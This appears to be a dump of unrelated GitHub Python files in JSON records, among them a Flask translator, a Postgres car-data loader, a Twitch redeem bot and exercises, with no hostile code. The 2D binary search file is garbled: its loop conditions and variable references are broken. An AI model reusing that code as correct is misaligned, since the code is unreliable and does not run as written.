service.run(json.dumps([{\"body\": \"Mein Windows Vista rechner will nicht mehr - ich kriege dauernd fehler meldungen. Ich wollte mir eh einen neuen kaufen, aber ich hab kein Geld. 
Kann Bill Gates mir helfen?\"}]))\n logging.warning(f'[SUCCESS] Service was deployed.')\n except Exception as e:\n logging.warning(f'[ERROR] Service was not deployed as expected. {e}')\n\n#Remove temp config\nos.remove( f'./src/{fn_config_infer}')","repo_name":"microsoft/verseagility","sub_path":"deploy/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"44"} +{"seq_id":"28867111867","text":"# testy__driver.py\n\nimport subprocess\nimport sys\n\n\n\ndef run_command__popen(command, communicate_string = None):\n\tp = subprocess.Popen(command, \n\t\tshell=True,\n\t\tstdin=subprocess.PIPE,\n\t\tstdout=subprocess.PIPE,\n\t\tstderr=subprocess.PIPE)\n\n\tp_status = None\n\n\tif communicate_string != None:\n\t\tprint(\"Calling communicate etc\")\n\t\t# get ret code of None if we don't do this\n\t\t# (stdout_data, stderr_data) = p.communicate(b\"alex\\nhuns\")\n\t\t(stdout_data, stderr_data) = p.communicate(b\"a.nice.key\\nThe value\\nf\\ny\")\n\n\t\t# SO suggestion instead of p.returncode. Still get 1.\n\t\tp_status = p.wait()\n\telse:\n\t\tp_status = p.wait()\n\n\t# print(f\"============ stdout looks like: {stdout_data}\")\n\n\n\t# stdoutdata, stderrdata = process.communicate()\n\t# print process.returncode\n\n\t# None means the process didn't terminate yet!\n\tprint(f\"RET CODE: {p.returncode} {p_status}\")\n\n\n# THIS WORKS\n# 'run' is preferred to 'check_output', according to https://stackoverflow.com/a/55758810\n# use 'input' param for the stdin content\ndef run_command__run(command, input_strings = None):\n\tprint(f\"\\n==================== calling run_command with command: {command} input: {input_strings}\")\n\t# output = subprocess.check_output(command, shell=True))\n\n\tcompleted_process = subprocess.run(command, input=input_strings, shell=True)\n\n\tprint(f\"completedProcess = {completed_process}\")\n\n\t# try:\n\t# output = subprocess.check_output(command, shell=True) \n\t# except subprocess.CalledProcessError as grepexc: \n\t# print(f\"error code {grepexc.returncode} output: {grepexc.output}\")\n\n\n\n# we get 127, i.e. -1, if communicate gives input not recognised, i.e. 
script doesn't exit\n# run_command__popen(\"testy_no_input_ret_0.py\")\n\n# so these both work\nrun_command__run(\"python3 testy_no_input_ret_0.py\")\nrun_command__run(\"python3 testy_no_input_ret_1.py\")\n\nrun_command__run(\"python3 testy_take_input_ret_0.py\", b\"alex\\nhunsley\\n\")\nrun_command__run(\"python3 testy_take_input_ret_1.py\", b\"alex\\nhunsley\\n\")\n\n# incomplete input test - bombs out with code 1 due to finding EOF in input\n# run_command__run(\"python3 testy_take_input_ret_1.py\", b\"alex\\n\")\n","repo_name":"alexhunsley/blackbox-command-tester","sub_path":"subprocess_spike/testy__driver.py","file_name":"testy__driver.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22962349539","text":"import re\nimport os\n\nimport numpy as np\n\nfile='D:/work2/cc.log'\nwith open(file,mode='r',encoding='UTF-8') as f:\n lines=str(f.readlines())\n pattern1 = re.compile('总花费为:(\\d+)')\n pattern2 = re.compile('总奖金为:(\\d+)')\n pattern3 = re.compile('回报率为:(\\d+.?\\d+)')\n m1 = re.findall(pattern1,lines)\n m2 = re.findall(pattern2,lines)\n m3 = re.findall(pattern3,lines)\n m1 = list(map(int, m1))\n m2 = list(map(int, m2))\n m3 = list(map(float, m3))\n total_m1=sum(m1)\n total_m2=sum(m2)\n syl=round(total_m2/total_m1*100,2)\n print('总奖金为:%s,总花费为:%s,收益率为:%s%%'%(total_m2,total_m1,syl))\n\n arr = np.array(m3)\n arr1 = arr[arr >= syl]\n arr2 = arr1[ (arr1 >= 1300) & (arr1 <= 1550)]\n arr3 = arr1[ arr1 > 1550]\n sec = len(arr2)\n fir = len(arr3)\n #print(sorted(arr1))\n print('截至目前二等奖的数量为:%s,一等奖的数量为:%s'%(sec,fir))","repo_name":"QingFengLanYue/learn_python","sub_path":"ceshi/dealLog.py","file_name":"dealLog.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12602303940","text":"#\n# @lc app=leetcode.cn id=203 lang=python3\n#\n# [203] 移除链表元素\n#\n# https://leetcode-cn.com/problems/remove-linked-list-elements/description/\n#\n# algorithms\n# Easy (38.99%)\n# Total Accepted: 18.8K\n# Total Submissions: 47.3K\n# Testcase Example: '[1,2,6,3,4,5,6]\\n6'\n#\n# 删除链表中等于给定值 val 的所有节点。\n#\n# 示例:\n#\n# 输入: 1->2->6->3->4->5->6, val = 6\n# 输出: 1->2->3->4->5\n#\n#\n#\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nfrom comm import *\n# @lc code=start\n\nclass Solution(object):\n def removeElements(self, head, val):\n \"\"\"\n :type head: ListNode\n :type val: int\n :rtype: ListNode\n \"\"\"\n if not head:\n return\n new_head = ptr = ListNode(None)\n new_head.next = head\n while ptr.next:\n if ptr.next.val == val:\n ptr.next = ptr.next.next\n else:\n ptr = ptr.next\n return new_head.next\n\n# @lc code=end\n\n","repo_name":"ruanimal/vscode-leetcode-cn","sub_path":"203.移除链表元素.py","file_name":"203.移除链表元素.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41465194341","text":"from google_trans_new import google_translator\nfrom flask import Flask, request, jsonify, render_template, send_from_directory, url_for\nfrom gtts import gTTS\nfrom langdetect import detect, DetectorFactory\n\n# from flask_restful import Api, Resource, reqparse\n\n\napp = Flask(__name__)\n# API = Api(app)\n\n\n# class Translator(Resource):\n# @staticmethod\n# def post():\n# parser = reqparse.RequestParser()\n# parser.add_argument('text', default='')\n\n# 
args = parser.parse_args() # dict\n\n# sentence = args['text']\n\n# translator = google_translator()\n# trans_sentence = translator.translate(sentence, lang_tgt='vi')\n\n# # print(trans_sentence)\n\n# output = {'translated_text': trans_sentence}\n\n# return output, 200\n\n\n# API.add_resource(Translator, '/translate')\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n\n@app.route('/translate', methods=['POST'])\ndef translate():\n data = request.get_json(force=True)\n sentence = data['text']\n\n translator = google_translator()\n trans_sentence = translator.translate(sentence, lang_tgt='vi')\n\n # print(trans_sentence)\n\n output = {'translated_text': trans_sentence}\n\n return jsonify(output)\n\n\n@app.route('/speak', methods=['POST'])\ndef speak():\n data = request.get_json(force=True)\n sentence = data['text']\n filename = data['name'] + '.mp3'\n robot = gTTS(sentence, lang='vi', tld='com.vn')\n robot.save('tmp/' + filename)\n\n output = {\n \"url\": url_for('speak_file', filename=filename)\n }\n\n return jsonify(output)\n\n\n@app.route('/detect', methods=['POST'])\ndef detect_language():\n data = request.get_json(force=True)\n sentence = data['text']\n\n DetectorFactory.seed = 0\n output = {\"lang\": detect(sentence)}\n\n return jsonify(output)\n\n\n@app.route('/speak_files/')\ndef speak_file(filename):\n return send_from_directory('tmp', filename)\n\n\nif __name__ == '__main__':\n app.run(debug=True, use_reloader=True)\n","repo_name":"minhanh29/my_first_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40362329397","text":"import operator\n\n#Using the format function\nname = \"Julie\"\nage = \"42\"\n\nsentence = \"Hi my name is {} and I am {} years old\".format(name,age)\nprint(sentence)\n\n#manipulation\nfirst100Characters = sentence[:100] \n\n#\n\n#If else statement\nyear = 1830\nif year < 2100 and year > 2000:\n print(\"Welcome to the 21st century!\")\nelse:\n print(\"You are before or after the 21st century\")\n#\n\n#functions\ndef trippleprint(s):\n print(s+s+s)\n#\n\n#lists\nshoes = [\"Spizikes\",\"Air Force 1\",\"Curry 2\",\"Melo 5\"]\n#\n\n#loops\nnumbers = [76, 83, 16, 69, 52, 78, 10, 77, 45, 52, 32, 17, 58, 54, 79, 72, 55, 50, 81, 74, 45, 33, 38, 10, 40, 44, 70, 81, 79, 28, 83, 41, 14, 16, 27, 38, 20, 84, 24, 50, 59, 71, 1, 13, 56, 91, 29, 54, 65, 23, 60, 57, 13, 39, 58, 94, 94, 42, 46, 58, 59, 29, 69, 60, 83, 9, 83, 5, 64, 70, 55, 89, 67, 89, 70, 8, 90, 17, 48, 17, 94, 18, 98, 72, 96, 26, 13, 7, 58, 67, 38, 48, 43, 98, 65, 8, 74, 44, 92]\n\nfor num in numbers:\n if(num > 90):\n print(num)\n#\n\n#dictionary\nwords = [\"PoGo\",\"Spange\",\"Lie-Fi\"]\ndefinitions = [\"Slang for Pokemon Go\",\"To collect spare change, either from couches, passerbys on the street or any numerous other ways and means\",\"When your phone or tablet indicates that you are connected to a wireless network, however you are still unable to load webpages or use any internet services with your device\"]\n\ncooldictionary = dict(zip(words, definitions))\nprint(cooldictionary)\n#\n\n#Class\n#Something weird is classes can have extra variables that do not exist in the actual definition. 
So we could say\n#car c = Car(2018, \"chevy\", \"cobalt\")\n#c.tireCondition = new;\nclass Car:\n def __init__(self,year, make, model):\n self.year = year\n self.make = make\n self.model = model\n \n def age(self):\n return 2018 - self.year\n#\n\n#Helper Functions\n#length\nstringTest = \"ThisIsAtest\"\nlen(stringTest) #12\n\n#split\nstringTest2 = \"This Is A Sentence\" #\nstring2Words = stringTest2.split() #[This, Is, A, Test]\nstring2Length = len(string2Words) #4\n\n#sorting\n#What is operator? You need to 'import operator' at the top of the app\ntestDict = {}\nsorted(testDict.items(), key = operator.itemgetter(1), reverse=True)\n\n\n#","repo_name":"13igg/PythonPractice","sub_path":"Intro/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72769763332","text":"from .utils import *\n\ndef OUNoise(parclass):\n \"\"\"Requires parent class, inherited from Agent.\"\"\"\n \n class OUNoise(parclass):\n \"\"\"\n Ornstein-Uhlenbeck noise process.\n \n Args:\n OU_mu - float\n OU_theta - float\n OU_sigma - float\n \"\"\"\n __doc__ += parclass.__doc__\n PARAMS = parclass.PARAMS | {\"OU_mu\", \"OU_theta\", \"OU_sigma\"} \n \n def __init__(self, config):\n super().__init__(config)\n \n self.config.setdefault(\"OU_mu\", 0)\n self.config.setdefault(\"OU_theta\", 0.15)\n self.config.setdefault(\"OU_sigma\", 0.2)\n \n self.noise = self.config.OU_mu * np.ones(self.config.num_actions)\n\n def act(self, state):\n a = super().act(state, record)\n if self.is_learning:\n self.noise += self.config.OU_theta * (self.config.OU_mu - self.noise) + self.config.OU_sigma * np.random.normal(size=self.config.num_actions)\n return a + self.noise\n return a\n return OUNoise\n","repo_name":"FortsAndMills/Learning-Reinforcement-Learning","sub_path":"LRL/OUNoise.py","file_name":"OUNoise.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"44"} +{"seq_id":"35593325237","text":"import psycopg2\nfrom psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT\nimport sys\nimport json\nimport os\nimport utils\nimport logging\n\ndef get_connection():\n try:\n if \"DATABASE_CERT\" in os.environ:\n with open(\"./cert.pem\",'w') as cert_file:\n cert_file.write(os.environ[\"DATABASE_CERT\"])\n os.environ[\"PGSSLROOTCERT\"] = \"./cert.pem\"\n conn = psycopg2.connect(user=os.environ[\"PG_USER\"], host=os.environ[\"PG_HOST\"], password=os.environ[\"PG_PASSWORD\"], port=os.environ[\"PG_PORT\"], sslmode=\"verify-full\", dbname=os.environ[\"PG_DB\"])\n else:\n conn = psycopg2.connect(user=os.environ[\"PG_USER\"], host=os.environ[\"PG_HOST\"], password=os.environ[\"PG_PASSWORD\"], port=os.environ[\"PG_PORT\"])\n conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n cur = conn.cursor()\n cur.execute(\"CREATE DATABASE beetravels;\")\n logging.debug(\"create beetravels database\")\n cur.close()\n conn.close()\n except Exception as e:\n logging.warning(\"Error: Unable to create to the database\")\n logging.info(e)\n\n try:\n if \"DATABASE_CERT\" in os.environ:\n conn = psycopg2.connect(user=os.environ[\"PG_USER\"], host=os.environ[\"PG_HOST\"], password=os.environ[\"PG_PASSWORD\"], port=os.environ[\"PG_PORT\"], sslmode=\"verify-full\", database=\"beetravels\")\n else:\n conn = psycopg2.connect(user=os.environ[\"PG_USER\"], host=os.environ[\"PG_HOST\"], password=os.environ[\"PG_PASSWORD\"], port=os.environ[\"PG_PORT\"], 
database=\"beetravels\")\n conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n return conn\n except Exception as e:\n logging.warning(\"Error: Unable to connect to the database\")\n logging.info(e)\n exit(e)\n\ndef drop_table(cursor, table_name):\n try:\n cursor.execute(\"\"\"\n DROP TABLE %s;\n \"\"\" % table_name)\n logging.info(\"dropped table \"+table_name)\n except Exception as e:\n logging.warning(\"drop unsuccessful\")\n logging.info(e)\n\ndef populate_postgres(data, info):\n conn = get_connection()\n cur = conn.cursor()\n\n drop_table(cur, \"cars\")\n drop_table(cur, \"car_info\")\n \n try:\n logging.info(\"creating car info DB\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS CAR_INFO (\n ID VARCHAR(255) PRIMARY KEY NOT NULL,\n NAME VARCHAR(255) NOT NULL,\n BODY_TYPE VARCHAR(255) NOT NULL,\n STYLE VARCHAR(255) NOT NULL,\n IMAGE VARCHAR(255) NOT NULL\n ); \n \"\"\")\n logging.info(\"writing to car info DB\")\n cur.executemany(\"\"\"\n INSERT INTO car_info VALUES (%(id)s, %(name)s, %(body_type)s, %(style)s, %(image)s);\n \"\"\", info)\n\n logging.info(\"creating car DB\")\n cur.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS CARS (\n ID VARCHAR(255) PRIMARY KEY NOT NULL,\n CAR_ID VARCHAR(255) REFERENCES car_info(id),\n CITY VARCHAR(255) NOT NULL,\n COUNTRY VARCHAR(255) NOT NULL,\n RENTAL_COMPANY VARCHAR(255) NOT NULL,\n COST DECIMAL NOT NULL\n );\n \"\"\")\n\n logging.info(\"writing to car DB\")\n cur.executemany(\"\"\"\n INSERT INTO cars VALUES (%(id)s, %(car_id)s, %(city)s, %(country)s, %(rental_company)s, %(cost)s);\n \"\"\", data)\n\n conn.commit()\n\n except Exception as e:\n logging.error(\"Error: Unable to create and populate database\")\n logging.error(e)\n\n logging.info(\"data generated\")\n cur.close()\n conn.close()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n car_data = utils.load_json(\"cars.json\")\n car_info = utils.load_json(\"car-info.json\")\n populate_postgres(car_data, car_info)\n","repo_name":"bee-travels/data-generator","sub_path":"src/car_rental/postgres_upload_data.py","file_name":"postgres_upload_data.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"30636182385","text":"def BinarySearchRowAndColumnSorted(array,target):\n \"\"\"\n The input array is Row-wise and Column-wise sorted.\n Here, we will start checking from 0-th row and last column.\n If that element is equal to target, then return the index.\n If that element is greater than target, then drop that column.\n If that element is less than target, then drop that row.\n \"\"\"\n row=0\n column=len(array[0])-1\n while row=0:\n if array[row][column]==target:\n return [row,column]\n elif array[row][column]>target:\n column-=1\n else:\n row+=1\n return [-1,-1]\n\n\ndef BinarySearchSortedMatrix(array,target):\n \"\"\"\n Initially we will search in the middle column.\n If element is equal to target, then return the index.\n If element is greater than target, then drop the rows below that element.\n If element is less than target, then drop the rows above that element.\n\n Now we will have only two rows.\n\n We will check if the middle column of both the rows, contain the target. 
If yes, then return the index.\n Else, we will divide them into 4 1D array and then perform normal binary search.\n Part 1: Top row, from 0-th Column to mid-1 column\n Part 2: Top row, from mid+1 Column to last column\n Part 3: Bottom row, from 0-th Column to mid-1 column\n Part 4: Bottom row, from mid+1 Column to last column\n \"\"\"\n rowsCount=len(array)\n columnsCount=len(array[0])\n if rowsCount==0 or columnsCount==0:\n return [-1,-1]\n if rowsCount==1:\n rowNumber=0\n columnStart=0\n columnEnd=columnsCount-1\n else:\n rowStart=0\n rowEnd=rowsCount-1\n columnMid=columnsCount//2\n while rowStartarray[rowMid][columnMid]:\n rowStart=rowMid\n else:\n rowEnd=rowMid\n # Now two rows remaining\n if array[rowStart][columnMid]==target:\n return [rowStart,columnMid]\n if array[rowEnd][columnMid]==target:\n return [rowEnd,columnMid]\n if array[rowStart][0]<=target[rowNumber][columnMid]:\n columnStart=columnMid+1\n else:\n columnEnd=columnMid-1\n return [-1,-1]\n\n\narray1=[[10,20,30,40],\n [15,25,35,45],\n [28,29,37,49],\n [33,34,38,50]]\n\narray2=[[11,12,13,14],\n [15,16,17,18],\n [19,20,21,22],\n [23,24,25,26]]\n\nprint(BinarySearchRowAndColumnSorted(array1,37))\nprint(BinarySearchSortedMatrix(array2,23))","repo_name":"SandipPalit/Data-Structures-and-Algorithms-in-Python","sub_path":"Searching/BinarySearch2D.py","file_name":"BinarySearch2D.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"23343466047","text":"# -*- coding: utf-8 -*-\nfrom json import dumps\n\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import render\nfrom django_middleware_global_request import get_request\n\nfrom system.models.auth import User\n\n\ndef login(request):\n ctx = {\n 'title': '登录',\n }\n user = User.objects.filter(pk=1)\n setattr(request, 'user', {id: 1})\n r = get_request()\n print(r)\n return render(request, 'base.html', ctx)\n\n\ndef register(request):\n raise PermissionDenied\n\n\ndef layout(request):\n ctx = {}\n user = User.objects.filter(pk=1)\n ctx['username'] = '管理员'\n menu_tree = [\n {'id': 1, 'icon': 'layui-icon-home', 'path': 'home', 'label': '首页', 'hasChildren': False,\n 'data': dumps({'id': 1, 'path': 'home', 'label': '首页', 'hasChildren': False})},\n {'id': 2, 'label': '系统管理', 'hasChildren': True,\n 'data': dumps({'id': 2, 'label': '系统管理', 'hasChildren': True}),\n 'children': [\n {'id': 21, 'path': 'user/index', 'label': '用户管理', 'hasChildren': False,\n 'data': dumps({'id': 21, 'path': 'user/index', 'label': '用户管理', 'hasChildren': False})},\n {'id': 22, 'path': 'user/add', 'label': '用户', 'hasChildren': False,\n 'data': dumps({'id': 22, 'path': 'user/add', 'label': '用户', 'hasChildren': False})},\n ]},\n {'id': 3, 'label': '特殊页面', 'hasChildren': True,\n 'data': dumps({'id': 3, 'label': '特殊页面', 'hasChildren': True}),\n 'children': [\n {'id': 403, 'path': '403', 'label': '403', 'hasChildren': False,\n 'data': dumps({'id': 403, 'path': '403', 'label': '403', 'hasChildren': False})},\n {'id': 404, 'path': '404', 'label': '404', 'hasChildren': False,\n 'data': dumps({'id': 404, 'path': '404', 'label': '404', 'hasChildren': False})},\n {'id': 500, 'path': '500', 'label': '500', 'hasChildren': False,\n 'data': dumps({'id': 500, 'path': '500', 'label': '500', 'hasChildren': False})},\n {'id': 502, 'path': '502', 'label': '502', 'hasChildren': False,\n 'data': dumps({'id': 500, 'path': '502', 'label': '502', 'hasChildren': False})},\n ]},\n {},\n ]\n ctx['menuTree'] = 
menu_tree\n return render(request, 'layout.html', ctx)\n\n\ndef home(request):\n ctx = {'title': 'home'}\n return render(request, 'home.html', ctx)\n\n\ndef page_permission_denied(request):\n return render(request, '403.html', {})\n\n\ndef page_not_found(request):\n return render(request, '404.html', {})\n\n\ndef page_error(request):\n return render(request, '500.html', {})\n","repo_name":"xuelingfei/Worldlet-backend","sub_path":"system/views/auth_views.py","file_name":"auth_views.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36895570378","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import PolynomialFeatures\n\nDF=pd.read_csv(\"D:\\\\Scoala\\\\an3\\\\PYTHON_IA\\\\Fisiere_de_lucru2\\\\LUCRARI_5\\\\salarii_tabel.csv\")\n\nx=DF[\"Nivel\"]\ny=DF[\"Salariu\"]\n\nmodel=np.poly1d(np.polyfit(x,y,4))\nline=np.linspace(1,10,1000000)\n\ntrain_x,train_y,test_x,test_y=train_test_split(x.values,y.values,train_size=0.5,test_size=5)\n\nprint(\"Valori pentru antrenare:\")\nprint(train_x)\nprint(train_y)\n\nprint(\"Valori pentru testare:\")\nprint(test_x)\nprint(test_y)\n\n#Afisare grafic\nplt.title(\"Grafic salarii\")\nplt.scatter(x,y,color=\"blue\")\nplt.plot(line,model(line),color=\"green\")\nplt.xlabel(\"Pozitie\")\nplt.ylabel(\"Salariu\")\n\nplt.subplots()\nplt.title(\"Valori antrenate\")\nplt.scatter(train_x,train_y,color=\"red\")\n\nplt.subplots()\nplt.title(\"Valori testate\")\nplt.scatter(test_x,test_y,color=\"red\")\nplt.show()\n\n\n\n\n\n","repo_name":"AlexMuresan1/AI_Exercises","sub_path":"Lucrarea_5_Exercitiul_2_Muresan_Alexandru.py","file_name":"Lucrarea_5_Exercitiul_2_Muresan_Alexandru.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"5570474470","text":"n_inputs = int(input())\nplants = {}\n\nfor _ in range(n_inputs):\n plant_found = input().split('<->')\n plant, rarity = plant_found\n rarity = int(rarity)\n plants[plant] = [rarity]\n\ncommands = input().split(': ')\nwhile commands[0] != 'Exhibition':\n command, others = commands\n if command == 'Rate':\n plant, rating = others.split(' - ')\n rating = int(rating)\n if plant in plants:\n plants[plant].append(rating)\n else:\n print('error')\n\n elif command == 'Update':\n plant, new_rarity = others.split(' - ')\n new_rarity = int(new_rarity)\n if plant in plants:\n plants[plant][0] = new_rarity\n else:\n print('error')\n\n elif command == 'Reset':\n plant = others\n if plant in plants:\n plants[plant] = [plants[plant][0]]\n else:\n print(f'error')\n\n commands = input().split(': ')\n\nprint('Plants for the exhibition:')\nfor plant, statistics in plants.items():\n ratings = statistics[1:]\n length_ratings = len(ratings)\n if length_ratings > 0:\n print(f'- {plant}; Rarity: {statistics[0]}; Rating: {sum(ratings) / length_ratings:.2f}')\n else:\n print(f'- {plant}; Rarity: {statistics[0]}; Rating: {0:.2f}')","repo_name":"Svilkata88/SoftUni_python_fundamentials","sub_path":"final_exam_preparation/03_3_plant_discovery.py","file_name":"03_3_plant_discovery.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2396780366","text":"import subprocess as sp\nimport os\nimport glob\nfrom multiprocessing import Pool\nimport 
argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--src_dir\", type=str)\nparser.add_argument(\"--tgt_dir\", type=str)\nparser.add_argument(\"--tgt_sample_rate\", type=int, default=22050)\nparser.add_argument(\"--move_txt\", action=\"store_true\")\nparser.add_argument(\"--move_jams\", action=\"store_true\")\nargs = parser.parse_args()\n\nfiles = glob.glob(os.path.join(args.src_dir, \"*.wav\"))\nlf = len(files)\nprint(lf)\nTGT_DIR = args.tgt_dir\nSAMPLE_RATE = args.tgt_sample_rate\nif not os.path.exists(TGT_DIR):\n os.makedirs(TGT_DIR)\n\n\ndef process_idx(idx):\n f = files[idx]\n src_txt = f.replace(\".wav\", \".txt\")\n src_jams = f.replace(\".wav\", \".jams\")\n fname = f.split(\"/\")[-1].split(\".\")[0]\n tgt_f = os.path.join(TGT_DIR, \"{}.flac\".format(fname))\n tgt_txt = os.path.join(TGT_DIR, \"{}.txt\".format(fname))\n tgt_jams = os.path.join(TGT_DIR, \"{}.jams\".format(fname))\n command = \"ffmpeg -nostats -loglevel 0 -i '{}' -ac 1 -af aformat=s16:{} '{}'\".format(f, SAMPLE_RATE, tgt_f)\n # print(command)\n if not os.path.exists(tgt_f):\n sp.call(command, shell=True)\n\n if args.move_txt:\n txt_command = \"cp '{}' '{}'\".format(src_txt, tgt_txt)\n if not os.path.exists(tgt_txt):\n sp.call(txt_command, shell=True)\n if args.move_jams:\n jams_command = \"cp '{}' '{}'\".format(src_jams, tgt_jams)\n if not os.path.exists(tgt_jams):\n sp.call(jams_command, shell=True)\n if idx % 1000 == 0:\n print(\"Done {}/{}\".format(idx, lf))\n\n\nif __name__ == '__main__':\n pool = Pool(12)\n o = pool.map_async(process_idx, range(lf))\n res = o.get()\n pool.close()\n pool.join()\n # process_idx(0)\n","repo_name":"SarthakYadav/GISE-51-pytorch","sub_path":"scripts/wav2flac.py","file_name":"wav2flac.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"14110562728","text":"import setuptools\n\nfrom os import path\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetuptools.setup(\n name=\"vmrunPacked\",\n version=\"0.0.6\",\n author=\"William\",\n license=\"MIT\",\n # author_email=\"ganeshanthavasigti1032000@gmail.com\",\n description=\"Using vmrun to Control Virtual Machines. 
VmWare-vmrun execute actions use python\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n # url=\"https://github.com/THAVASIGTI/vmrunPacked.git\",\n packages=setuptools.find_packages(),\n include_package_data=True,\n classifiers=[\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3',\n)\n","repo_name":"THAVASIGTI/vmrunPacked","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4360528787","text":"from typing import List\n\nfrom twitch_api import TwitchLoyaltyPointRPBot\nfrom loyalty import LoyaltyRedeem\nimport settings\n\n\nclass RedeemBot(TwitchLoyaltyPointRPBot):\n def setup_commands(self):\n self.commands.add('redeems')\n self.commands.add('redeem')\n self.commands.add('redeem_info')\n self.commands.add('points')\n self.commands.add('give')\n self.commands.add('streak')\n self.commands.add('stats')\n\n def setup_redeems(self):\n self.redeem_list['commit'] = LoyaltyRedeem('commit', 'Force me to commit my code.', 100)\n self.redeem_list['hydrate'] = LoyaltyRedeem('hydrate', 'Take a sip of water, or whatever it is I\\'m drinking atm.', 100)\n self.redeem_list['question'] = LoyaltyRedeem('question', 'Ask me a question, anything, and I\\'ll do my best to answer it', 200)\n self.redeem_list['squats'] = LoyaltyRedeem('squats', 'Give me buns of steel! I\\'ll do 10 squats', 1000)\n self.redeem_list['comment'] = LoyaltyRedeem('comment', 'I\\'ll put your comment in my code whatever it is, must be in Twitch\\'s ToS', 1000)\n self.redeem_list['raid'] = LoyaltyRedeem('raid', 'You get to choose the destination for the raid at the end of the stream', 5000)\n self.redeem_list['project'] = LoyaltyRedeem('project', 'I\\'ll do a coding project of your choice, must be within Twitch\\'s ToS', 999999)\n\n def redeems(self, user: str, args: List[str]):\n self.chat('The list of valid redeems is {}, use !redeem_info rname to see what they do!'.format(\n str(list(self.redeem_list.keys()))[1:-1])\n )\n\n def redeem(self, user: str, args: List[str]):\n pnts = self.users[user].points\n if len(args) > 0 and args[0] in self.redeem_list:\n if pnts >= self.redeem_list[args[0]].cost:\n self.chat('@iggy12345101: @{} has redeemed {}'.format(user, args[0]))\n self.users[user].points -= self.redeem_list[args[0]].cost\n else:\n self.chat('@{} Insufficient points.'.format(user))\n else:\n self.chat('@{} That redeem doesn\\'t exist, please use !redeems to see a list of valid redeems'.format(user))\n\n def redeem_info(self, user: str, args: List[str]):\n if len(args) > 0 and args[0] in self.redeem_list:\n r = self.redeem_list[args[0]]\n self.chat('@{} {} x{}: {}'.format(user, r.title, r.cost, r.description))\n else:\n self.chat('@{} That redeem doesn\\'t exist, please use !redeems to see a list of valid redeems'.format(user))\n\n def points(self, user: str, args: List[str]):\n self.chat('@{} you have {} points!'.format(user, self.users[user].points))\n\n def give(self, user: str, args: List[str]):\n if len(args) > 1:\n try:\n target = args[0]\n if target.startswith('@'):\n target = target[1:]\n\n pnts = int(args[1])\n\n if target in self.users:\n self.users[target].points += pnts\n self.chat('Gave {} points from @{} to @{}'.format(pnts, user, 
target))\n else:\n self.chat('@{} the user @{} doesn\\'t exist, please ensure they have chatted at least once.'.format(\n user, target))\n except ValueError:\n self.chat('@{} that value {} is invalid, please enter a number (0, infinity]'.format(user, args[1]))\n else:\n self.chat('@{} too few arguments supplied, the syntax is !give @target points .'.format(user))\n\n def streak(self, user: str, args: List[str]):\n self.chat('@{} You\\'ve come to {} streams in a row!'.format(user, self.users[user].visit_streak))\n\n def stats(self, user: str, args: List[str]):\n u = self.users[user]\n self.chat('@{} Points: {}, Chats: {}, Streak: {}'.format(user, u.points, u.num_chats, u.visit_streak))\n\n\nif __name__ == '__main__':\n print('Starting automod twitch bot')\n b = RedeemBot(settings.tmi_token, settings.bot_nick, settings.channel)\n b.run()\n\n","repo_name":"aaron-jencks/twitch-moderator-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5768184175","text":"import 